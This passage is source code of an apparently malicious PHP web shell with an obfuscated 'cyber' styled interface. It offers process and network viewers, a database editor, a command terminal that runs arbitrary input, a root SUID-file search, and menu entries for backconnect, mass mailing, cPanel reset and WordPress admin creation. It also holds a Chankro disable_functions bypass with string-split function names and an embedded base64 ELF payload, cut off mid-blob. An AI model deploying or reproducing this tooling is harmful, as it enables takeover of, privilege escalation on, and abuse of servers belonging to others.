endforeach; </tbody> </div> </div> elseif (isset($_GET['process'])): <div class="glass-effect rounded-lg p-6 mb-6 cyber-border"> <div class="flex items-center justify-between mb-4"> <h2 class="text-xl font-bold cyber-font cyber-glow"> <i class="fas fa-microchip text-blue-400 mr-2"></i> Process Manager <div> <a href="?d== hx($fungsi[0]()) " class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-arrow-left mr-1"></i> Back </a> </div> </div> <div class="glass-effect rounded-lg p-4 cyber-border"> <div class="mb-4"> <div class="flex items-center"> <i class="fas fa-info-circle text-blue-400 mr-2"></i> <span class="text-sm">Showing all running processes. Click on a process to kill it.</span> </div> </div> <div class="overflow-x-auto"> <table class="process-table"> <thead> <th>PID</th> <th>User</th> <th>CPU %</th> <th>MEM %</th> <th>Command</th> <th>Action</th>
</thead> <tbody> $processes = getProcessList(); foreach ($processes as $process): <td class="process-pid">= $process['pid'] <td class="process-user">= $process['user'] <td class="process-cpu">= $process['cpu'] <td class="process-mem">= $process['mem'] <td class="process-command" title="= htmlspecialchars($process['command']) ">= htmlspecialchars(substr($process['command'], 0, 50)) | |
endforeach; </tbody> </div> </div> </div> elseif (isset($_GET['network'])): <div class="glass-effect rounded-lg p-6 mb-6 cyber-border"> <div class="flex items-center justify-between mb-4"> <h2 class="text-xl font-bold cyber-font cyber-glow"> <i class="fas fa-network-wired text-green-400 mr-2"></i> Network Connections <div> <a href="?d== hx($fungsi[0]()) " class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-arrow-left mr-1"></i> Back </a> </div> </div> <div class="glass-effect rounded-lg p-4 cyber-border"> <div class="mb-4"> <div class="flex items-center"> <i class="fas fa-info-circle text-blue-400 mr-2"></i> <span class="text-sm">Showing all active network connections.</span> </div> </div> <div class="overflow-x-auto"> <table class="network-table"> <thead> <th>Protocol</th> <th>Local Address</th> <th>Remote Address</th> <th>Status</th> <th>PID</th>
</thead> <tbody> $connections = getNetworkConnections(); foreach ($connections as $conn): | = $conn['proto'] | <td class="network-local">= $conn['local'] <td class="network-remote">= $conn['remote'] <td class="network-status">= $conn['status'] <td class="network-pid">= $conn['pid']
endforeach; </tbody> </div> </div> </div> elseif (isset($_GET['dbmanager'])): <div class="glass-effect rounded-lg p-6 mb-6 cyber-border"> <div class="flex items-center justify-between mb-4"> <h2 class="text-xl font-bold cyber-font cyber-glow"> <i class="fas fa-database text-blue-400 mr-2"></i> Database Manager <div> <a href="?d== hx($fungsi[0]()) " class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-arrow-left mr-1"></i> Back </a> </div> </div> <div class="glass-effect rounded-lg p-4 cyber-border"> <h3 class="text-lg font-medium cyber-font mb-3 cyber-glow"> <i class="fas fa-plug text-green-400 mr-2"></i> Database Connection if (isset($_POST['db_connect']) || (isset($_GET['table']) && isset($_GET['db_host']))) { $db_host = isset($_POST['db_host']) ? $_POST['db_host'] : $_GET['db_host']; $db_port = isset($_POST['db_port']) ? $_POST['db_port'] : $_GET['db_port']; $db_user = isset($_POST['db_user']) ? $_POST['db_user'] : $_GET['db_user']; $db_pass = isset($_POST['db_pass']) ? $_POST['db_pass'] : $_GET['db_pass']; $db_name = isset($_POST['db_name']) ? $_POST['db_name'] : $_GET['db_name']; try { $dsn = "mysql:host=$db_host;port=$db_port"; if (!empty($db_name)) { $dsn .= ";dbname=$db_name"; } $pdo = new PDO($dsn, $db_user, $db_pass); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); echo '<div class="mt-6">'; echo '<h3 class="text-lg font-medium cyber-font mb-3 cyber-glow">'; echo '<i class="fas fa-database text-blue-400 mr-2"></i>'; echo 'Database Information'; echo ''; if (empty($db_name)) { $stmt = $pdo->query("SHOW DATABASES"); $databases = $stmt->fetchAll(PDO::FETCH_COLUMN); echo '<div class="db-tables-list">'; echo '<h4 class="text-md font-medium cyber-font mb-2 cyber-glow">Available Databases</h4>'; foreach ($databases as $database) { echo '<div class="db-table-item">'; echo '<a href="?d=' . hx($fungsi[0]()) . '&dbmanager&db_host=' . urlencode($db_host) . '&db_port=' . urlencode($db_port) . '&db_user=' . urlencode($db_user) . '&db_pass=' . urlencode($db_pass) . '&db_name=' . urlencode($database) . '">'; echo '<i class="fas fa-database text-blue-400 mr-2"></i>' . htmlspecialchars($database); echo '</a>'; echo '</div>'; } echo '</div>'; } else { $stmt = $pdo->query("SHOW TABLES"); $tables = $stmt->fetchAll(PDO::FETCH_COLUMN); echo '<div class="db-tables-list">'; echo '<h4 class="text-md font-medium cyber-font mb-2 cyber-glow">Tables in ' . htmlspecialchars($db_name) . '</h4>'; foreach ($tables as $table) { echo '<div class="db-table-item">'; echo '<a href="?d=' . hx($fungsi[0]()) . '&dbmanager&db_host=' . urlencode($db_host) . '&db_port=' . urlencode($db_port) . '&db_user=' . urlencode($db_user) . '&db_pass=' . urlencode($db_pass) . '&db_name=' . urlencode($db_name) . '&table=' . urlencode($table) . '">'; echo '<i class="fas fa-table text-blue-400 mr-2"></i>' . htmlspecialchars($table); echo '</a>'; echo '</div>'; } echo '</div>'; if (isset($_GET['table'])) { $table = $_GET['table']; if (isset($_POST['delete_record'])) { $id_column = $_POST['id_column']; $id_value = $_POST['id_value']; $stmt = $pdo->prepare("DELETE FROM `$table` WHERE `$id_column` = ?"); $stmt->execute([$id_value]); echo '<div class="bg-green-600 text-white p-3 rounded mb-4">Record deleted successfully.</div>'; } if (isset($_POST['add_record'])) { $columns = []; $values = []; $placeholders = []; foreach ($_POST as $key => $value) { if (strpos($key, 'new_') === 0) { $column = substr($key, 4); $columns[] = "`$column`"; $values[] = $value; $placeholders[] = '?'; } } $sql = "INSERT INTO `$table` (" . implode(', ', $columns) . ") VALUES (" . implode(', ', $placeholders) . ")"; $stmt = $pdo->prepare($sql); $stmt->execute($values); echo '<div class="bg-green-600 text-white p-3 rounded mb-4">Record added successfully.</div>'; } if (isset($_POST['update_record'])) { $id_column = $_POST['id_column']; $id_value = $_POST['id_value']; $setParts = []; $values = []; foreach ($_POST as $key => $value) { if (strpos($key, 'edit_') === 0) { $column = substr($key, 5); $setParts[] = "`$column` = ?"; $values[] = $value; } } $values[] = $id_value; $sql = "UPDATE `$table` SET " . implode(', ', $setParts) . " WHERE `$id_column` = ?"; $stmt = $pdo->prepare($sql); $stmt->execute($values); echo '<div class="bg-green-600 text-white p-3 rounded mb-4">Record updated successfully.</div>'; } <div id="editModal" class="modal hidden"> <div class="max-h-[60vh] cyber-border overflow-y-auto"> <div class="flex justify-between items-center mb-4"> <h3 class="text-lg font-bold cyber-font cyber-glow">Edit Record <button onclick="hideModal('editModal')" class="text-gray-400 hover:text-white"> <i class="fas fa-times"></i> </button> </div> </div> </div> <div id="deleteModal" class="modal hidden"> <div class="modal-content cyber-border"> <div class="flex justify-between items-center mb-4"> <h3 class="text-lg font-bold cyber-font cyber-glow">Delete Record <button onclick="hideModal('deleteModal')" class="text-gray-400 hover:text-white"> <i class="fas fa-times"></i> </button> </div> </div> </div> <div id="addModal" class="modal hidden"> <div class="max-h-[60vh] cyber-border overflow-y-auto modal-content cyber-border"> <div class="flex justify-between items-center mb-4"> <h3 class="text-lg font-bold cyber-font cyber-glow">Add New Record <button onclick="hideModal('addModal')" class="text-gray-400 hover:text-white"> <i class="fas fa-times"></i> </button> </div> </div> </div> $stmt = $pdo->query("DESCRIBE `$table`"); $columns_info = $stmt->fetchAll(PDO::FETCH_ASSOC); $primary_key = ''; foreach ($columns_info as $col) { if ($col['Key'] == 'PRI') { $primary_key = $col['Field']; break; } } $stmt = $pdo->query("SELECT * FROM `$table` LIMIT 100"); $rows = $stmt->fetchAll(PDO::FETCH_ASSOC); echo '<div class="mt-6">'; echo '<div class="flex justify-between items-center mb-4">'; echo '<h4 class="text-md font-medium cyber-font cyber-glow">Data in ' . htmlspecialchars($table) . '</h4>'; echo '<button onclick="showAddModal()" class="flex items-center">'; echo '<i class="fas fa-plus mr-1"></i> Add Record'; echo '</button>'; echo '</div>'; if (count($rows) > 0) { echo '<div class="max-h-[60vh] cyber-border glass-effect overflow-y-auto">'; echo '<table class="database-table">'; echo '<thead>'; echo ''; foreach (array_keys($rows[0]) as $column) { echo '<th>' . htmlspecialchars($column) . '</th>'; } echo '<th>Actions</th>'; echo '
'; echo '</thead>'; echo '<tbody>'; foreach ($rows as $row) { echo ''; foreach ($row as $value) { echo '| ' . htmlspecialchars($value) . ' | '; } echo '<td class="flex space-x-1">'; echo '<button onclick="showEditModal(' . htmlspecialchars(json_encode($row), ENT_QUOTES, 'UTF-8') . ', \'' . htmlspecialchars($primary_key) . '\', \'' . htmlspecialchars($table) . '\')">'; echo '<i class="fas fa-edit mr-2"></i> Edit'; echo '</button>'; echo '<button onclick="showDeleteModal(\'' . htmlspecialchars($primary_key) . '\', \'' . htmlspecialchars($row[$primary_key]) . '\', \'' . htmlspecialchars($table) . '\')">'; echo '<i class="fas fa-trash mr-2"></i> Delete'; echo '</button>'; echo ''; echo '
'; } echo '</tbody>'; echo ''; echo '</div>'; } else { echo '<div class="text-gray-400">No data found in this table.</div>'; } echo '</div>'; } } echo '</div>'; } catch (PDOException $e) { echo '<div class="mt-4 text-red-400">'; echo '<i class="fas fa-exclamation-triangle mr-2"></i>'; echo 'Connection failed: ' . htmlspecialchars($e->getMessage()); echo '</div>'; } } </div> </div> <script> function showModal(modalId) { document.getElementById(modalId).classList.remove('hidden'); } function hideModal(modalId) { document.getElementById(modalId).classList.add('hidden'); } function showEditModal(rowData, primaryKey, tableName) { document.getElementById('editIdColumn').value = primaryKey; document.getElementById('editIdValue').value = rowData[primaryKey]; const fieldsContainer = document.getElementById('editFields'); fieldsContainer.innerHTML = ''; for (const [key, value] of Object.entries(rowData)) { if (key !== primaryKey) { fieldsContainer.innerHTML += ` <div> <label class="db-form-label">${key}</label> </div> `; } } document.getElementById('editForm').action = window.location.href; showModal('editModal'); } function showDeleteModal(primaryKey, idValue, tableName) { document.getElementById('deleteIdColumn').value = primaryKey; document.getElementById('deleteIdValue').value = idValue; document.getElementById('deleteForm').action = window.location.href; showModal('deleteModal'); } function showAddModal() { const fieldsContainer = document.getElementById('addFields'); fieldsContainer.innerHTML = ''; const headers = document.querySelectorAll('.database-table th:not(:last-child)'); headers.forEach(header => { const columnName = header.textContent.trim(); fieldsContainer.innerHTML += ` <div> <label class="db-form-label">${columnName}</label> </div> `; }); document.getElementById('addForm').action = window.location.href; showModal('addModal'); } </script> elseif (isset($_GET['malwarescan'])): <div class="glass-effect rounded-lg p-6 mb-6"> <div class="flex items-center justify-between mb-4"> <h2 class="text-xl font-bold"> <i class="fas fa-shield-alt text-red-400 mr-2"></i> Malware Scanner <a href="?d== hx($fungsi[0]()) " class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center"> <i class="fas fa-arrow-left mr-1"></i> Back </a> </div> <div class="glass-effect rounded-lg p-4 mb-6"> <h3 class="text-lg font-medium mb-3"> <i class="fas fa-search text-blue-400 mr-2"></i> Scan Directory if (isset($_POST['start_scan'])) { $scan_dir = $_POST['scan_dir']; $scan_type = $_POST['scan_type']; $malware_signatures = array( // Code Execution 'eval(', 'system(', 'exec(', 'shell_exec(', 'passthru(', 'popen(', 'proc_open(', 'nepo_corp', 'curl', // Obfuscation / Encoding 'gzinflate(', 'gzuncompress(', 'base64_decode(', 'hex2bin(', 'str_rot13(', 'chr(', 'strrev(', 'rawurldecode(', 'unlink(', 'rename(', 'copy(', 'move_uploaded_file(', 'fopen(', 'lruc', ); function scan_directory($dir, $signatures, $deep = false) { $results = array(); $files = scandir($dir); $chunk_size = 50; // Process files in chunks foreach (array_chunk($files, $chunk_size) as $chunk) { foreach ($chunk as $file) { if ($file == '.' || $file == '..') continue; $path = $dir . '/' . $file; if (is_dir($path) && $deep) { $sub_results = scan_directory($path, $signatures, $deep); $results = array_merge($results, $sub_results); } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if (in_array($ext, array('php', 'phtml'))) { $content = file_get_contents($path); foreach ($signatures as $sig) { if (strpos($content, $sig) !== false) { $results[] = array( 'file' => $path, 'signature' => $sig, 'line' => find_line_number($content, $sig) ); break; } } } } } } return $results; } function find_line_number($content, $search) { $lines = explode("\n", $content); foreach ($lines as $i => $line) { if (strpos($line, $search) !== false) { return $i + 1; } } return 'N/A'; } $deep_scan = ($scan_type == 'deep'); $scan_results = scan_directory($scan_dir, $malware_signatures, $deep_scan); echo '<div class="glass-effect rounded-lg p-4">'; echo '<h3 class="text-lg font-medium mb-3">'; echo '<i class="fas fa-list text-blue-400 mr-2"></i>'; echo 'Scan Results'; echo ''; if (count($scan_results) > 0) { <div class="max-h-[60vh] cyber-border glass-effect overflow-y-auto"> <table class="w-full text-sm text-left text-white bg-slate-800 border border-slate-700"> <thead class="bg-slate-700 text-slate-200 uppercase text-xs"> <th class="px-4 py-3 w-2/5"><i class="fas fa-file-code mr-1"></i>File</th> <th class="px-4 py-3 w-1/4"><i class="fas fa-bug mr-1 text-red-400"></i>Malware Type</th> <th class="px-4 py-3 w-1/6"><i class="fas fa-align-left mr-1"></i>Line</th> <th class="px-4 py-3 w-1/6 text-center"><i class="fas fa-tools mr-1"></i>Action</th>
</thead> <tbody class="text-slate-300"> foreach ($scan_results as $r): <tr class="border-b border-slate-700 hover:bg-slate-700/50"> <td class="px-4 py-3 break-all"> <span class="block font-medium text-white">= htmlspecialchars(basename($r['file'])) </span> <small class="text-slate-400">= htmlspecialchars(dirname($r['file'])) </small> <td class="px-4 py-3 text-red-400"> <code>= htmlspecialchars($r['signature']) </code> <td class="px-4 py-3">= $r['line'] <td class="px-4 py-3 text-center"> <a href="?d== hx(dirname($r['file'])) &f== hx(basename($r['file'])) " class="inline-block text-blue-400 hover:text-blue-300 mx-1" title="Edit File"> <i class="fas fa-edit"></i> </a> <a href="?action=delete&item== hx($r['file']) " class="inline-block text-red-400 hover:text-red-300 mx-1" title="Delete File"> <i class="fas fa-trash-alt"></i> </a> endforeach; </tbody> </div> <div class="mt-4 bg-red-900/50 p-3 rounded"> <i class="fas fa-exclamation-triangle text-red-400 mr-2"></i> <span class="font-medium">Found = count($scan_results) potential malware files!</span> </div> } else { echo '<div class="bg-green-900/50 p-3 rounded">'; echo '<i class="fas fa-check-circle text-green-400 mr-2"></i>No malware signatures found in scanned files.'; echo '</div>'; } echo '</div>'; } </div> </div> else: <!-- System Stats Grid --> <div class="stats-grid"> <!-- CPU Card --> <div class="info-card rounded-lg p-4 cyber-panel"> <div class="flex items-center justify-between mb-2"> <div class="flex items-center"> <i class="fas fa-microchip text-blue-400 mr-2 cyber-glow"></i> <span class="font-medium cyber-font">CPU LOAD</span> </div> <span class="text-blue-400 cyber-font">= $sysInfo['cpu_load'] !== 'N/A' ? round($sysInfo['cpu_load'], 2) : 'N/A' </span> </div> <div class="progress-container mb-2"> <div class="progress-bar progress-cpu" style="width: = $sysInfo['cpu_load'] !== 'N/A' ? round($sysInfo['cpu_load'], 2) . '%' : 'N/A' "></div> </div> <div class="text-xs text-gray-400 flex justify-between"> <span>0%</span> <span class="text-blue-400 cyber-font"> = $sysInfo['cpu_load'] !== 'N/A' ? round($sysInfo['cpu_load'], 2) . '%' : 'N/A' </span> </div> </div> <!-- Memory Card --> <div class="info-card rounded-lg p-4 cyber-panel"> <div class="flex items-center justify-between mb-2"> <div class="flex items-center"> <i class="fas fa-memory text-green-400 mr-2 cyber-glow-success"></i> <span class="font-medium cyber-font">MEMORY</span> </div> <span class="text-green-400 cyber-font">= formatMemory($sysInfo['mem_total']) </span> </div> <div class="progress-container mb-2"> <div class="progress-bar progress-mem" style="width: = $memUsagePercent %"></div> </div> <div class="text-xs text-gray-400 flex justify-between"> <span>0%</span> <span class="text-green-400 cyber-font"> = $memUsagePercent > 0 ? round($memUsagePercent, 2) . '%' : 'N/A' </span> </div> </div> <!-- Disk Card --> <div class="info-card rounded-lg p-4 cyber-panel"> <div class="flex items-center justify-between mb-2"> <div class="flex items-center"> <i class="fas fa-hdd text-yellow-400 mr-2 cyber-glow-warning"></i> <span class="font-medium cyber-font">DISK</span> </div> <span class="text-yellow-400 cyber-font">= $sysInfo['disk_total'] !== 'N/A' ? formatMemory($sysInfo['disk_total']) : 'N/A' </span> </div> <div class="progress-container mb-2"> <div class="progress-bar progress-disk" style="width: = $diskUsagePercent %"></div> </div> <div class="text-xs text-gray-400 flex justify-between"> <span>0%</span> <span class="text-green-400 cyber-font"> = $diskUsagePercent > 0 ? round($diskUsagePercent, 2) . '%' : 'N/A' </span> </div> </div> <!-- Uptime Card --> <div class="info-card rounded-lg p-4 cyber-panel"> <div class="flex items-center justify-between"> <div class="flex items-center"> <i class="fas fa-clock text-purple-400 mr-2 cyber-glow"></i> <span class="font-medium cyber-font">UPTIME</span> </div> <span class="text-purple-400 cyber-font">= formatUptime($sysInfo['uptime']) </span> </div> </div> </div> <!-- Server Info --> <div class="glass-effect cyber-panel rounded-lg p-4 mb-6 cyber-border"> <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-5 gap-5"> <div class="flex items-center"> <i class="fas fa-server text-blue-400 mr-2 cyber-glow"></i> <div> <div class="text-xs text-gray-400 cyber-font">HOSTNAME</div> <div class="text-sm">= $fungsi[8](); </div> </div> </div> <div class="flex items-center"> <i class="fas fa-globe text-green-400 mr-2 cyber-glow-success"></i> <div> <div class="text-xs text-gray-400 cyber-font">SOFTWARE</div> <div class="text-sm">= $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"]; </div> </div> </div> <div class="flex items-center"> <i class="fas fa-network-wired text-purple-400 mr-2 cyber-glow"></i> <div> <div class="text-xs text-gray-400 cyber-font">IP ADDRESS</div> <div class="text-sm">= gethostbyname($_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x41\x44\x44\x52"]); </div> </div> </div> <div class="flex items-center"> <i class="fas fa-user text-yellow-400 mr-2 cyber-glow-warning"></i> <div> <div class="text-xs text-gray-400 cyber-font">USER</div> <div class="text-sm">= $fungsi[9](); </div> </div> </div> <div class="flex items-center"> <i class="fab fa-php text-indigo-400 mr-2 cyber-glow"></i> <div> <div class="text-xs text-gray-400 cyber-font">PHP VERSION</div> <div class="text-sm">= PHP_VERSION; </div> </div> </div> </div> </div> <div class="path-breadcrumb glass-effect rounded-lg p-3 mb-4 flex items-center flex-wrap cyber-border"> $cwd = str_replace("\\", "/", $get_cwd); $pwd = explode("/", $cwd); if (stristr(PHP_OS, "WIN")) { windowsDriver(); } foreach ($pwd as $id => $val) { if ($val == '' && $id == 0) { echo '<a href="?d=' . hx('/') . '" class="flex items-center text-blue-400 hover:text-blue-300 mr-2 cyber-font"> <i class="fas fa-home mr-1"></i> / </a>'; continue; } if ($val == '') continue; echo '<span class="text-gray-400 mr-2 cyber-font">/</span>'; echo '<a href="?d='; for ($i = 0; $i <= $id; $i++) { echo hx($pwd[$i]); if ($i != $id) echo hx("/"); } echo '" class="text-green-400 hover:text-green-300 mr-2 cyber-font">' . $val . '</a>'; } <a href='?d== hx(__DIR__) ' class="ml-auto bg-indigo-600 hover:bg-indigo-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-home mr-1"></i> Home </a> </div> <div class="glass-effect rounded-lg overflow-hidden cyber-border"> <div class="hidden md:grid grid-cols-12 bg-slate-800 p-3 font-medium cyber-font"> <div class="col-span-6 flex items-center"> <span>NAME</span> </div> <div class="col-span-2 text-center">SIZE</div> <div class="col-span-2 text-center">PERMISSIONS</div> <div class="col-span-2 text-center">ACTIONS</div> </div> </div> endif; </div> </div> </div> if (isset($_GET['cpanelreset'])) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-md p-6 modal-content"> <div class="flex items-center justify-between mb-4"> <h3 class="text-lg font-bold">:: Cpanel Reset <a href="?d== hx($fungsi[0]()) " class="text-gray-400 hover:text-white">×</a> </div> </div> </div> endif; if (isset($_GET['createwp'])) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-md p-6 modal-content"> <div class="flex items-center justify-between mb-4"> <h3 class="text-lg font-bold text-center">CREATE WORDPRESS ADMIN PASSWORD <a href="?d== hx($fungsi[0]()) " class="text-gray-400 hover:text-white">×</a> </div> </div> </div> endif; if (isset($_GET['backconnect'])) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-md p-6 modal-content"> <div class="flex items-center justify-between mb-4"> <h3 class="text-lg font-bold">:: Backconnect <a href="?d== hx($fungsi[0]()) " class="text-gray-400 hover:text-white">×</a> </div> </div> </div> endif; if (isset($_GET['mailer'])) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-md p-6 modal-content"> <div class="flex items-center justify-between mb-4"> <h3 class="text-lg font-bold">:: PHP Mailer <a href="?d== hx($fungsi[0]()) " class="text-gray-400 hover:text-white">×</a> </div> </div> </div> endif; if ($_GET['f']) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-6xl h-[80vh] flex flex-col modal-content"> <div class="flex items-center justify-between p-4 border-b border-slate-700"> <h3 class="text-lg font-bold"> <i class="fas fa-code icon-blue mr-2"></i> Code Editor : = unx($_GET['f']); <button id="close-editor-btn" class="text-gray-400 hover:text-white">×</button> </div> </div> </div> endif; if ($_GET['terminal'] == "normal") : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-4xl h-[80vh] flex flex-col modal-content"> <div class="flex items-center justify-between p-4 border-b border-slate-700"> <h3 class="text-lg font-bold"> <i class="fas fa-terminal icon-green mr-2"></i> TERMINAL <a href="" class="close-terminal text-gray-400 hover:text-white">×</a> </div> <textarea class="terminal-output flex-1 overflow-auto p-4" disabled> if (isset($_POST['terminal'])) { echo $fungsi[10](cmd($_POST['terminal-text'] . " 2>&1"));} </textarea> </div> </div> endif; if ($_GET['scan'] == "suid") : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-4xl h-[80vh] flex flex-col modal-content"> <div class="flex items-center justify-between p-4 border-b border-slate-700"> <h3 class="text-lg font-bold"> <i class="fas fa-terminal icon-green mr-2"></i> TERMINAL <a href="" class="close-terminal text-gray-400 hover:text-white">×</a> </div> <textarea class="terminal-output flex-1 overflow-auto p-4" disabled> echo $fungsi[10](cmd("find / -user root -perm /4000 2>/dev/null")); </textarea> </div> </div> endif; if ($_GET['terminal'] == "chankro") : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-4xl h-[80vh] flex flex-col modal-content"> <div class="flex items-center justify-between p-4 border-b border-slate-700"> <h3 class="text-lg font-bold"> <i class="fas fa-terminal icon-green mr-2"></i> TERMINAL <a href="" class="close-terminal text-gray-400 hover:text-white">×</a> </div> <div class="terminal-output flex-1 overflow-auto p-4"> if (isset($_POST['terminal-chankro'])) { $p = "p"."u"."t"."e"."n"."v"; $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s"; $m = "m"."a"."i"."l"; $base = "ba"."se"."64"."_"."de"."co"."de"; $en = "ba"."se"."64"."_"."en"."co"."de"; $mb = "m"."b"."_"."s"."e"."n"."d"."_"."m"."a"."i"."l"; $err = "e"."r"."r"."o"."r"."_"."l"."o"."g"; $drnm = "d"."i"."r"."n"."a"."m"."e"; $imp = "i"."m"."a"."p"."_"."m"."a"."i"."l"; $currentFilePath = $_SERVER['PHP_SELF']; $doc = $_SERVER['DOCUMENT_ROOT']; $directoryPath = dirname($currentFilePath); $full = $doc . $directoryPath; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; if(isset($_POST['exechankro'])){ $hook = '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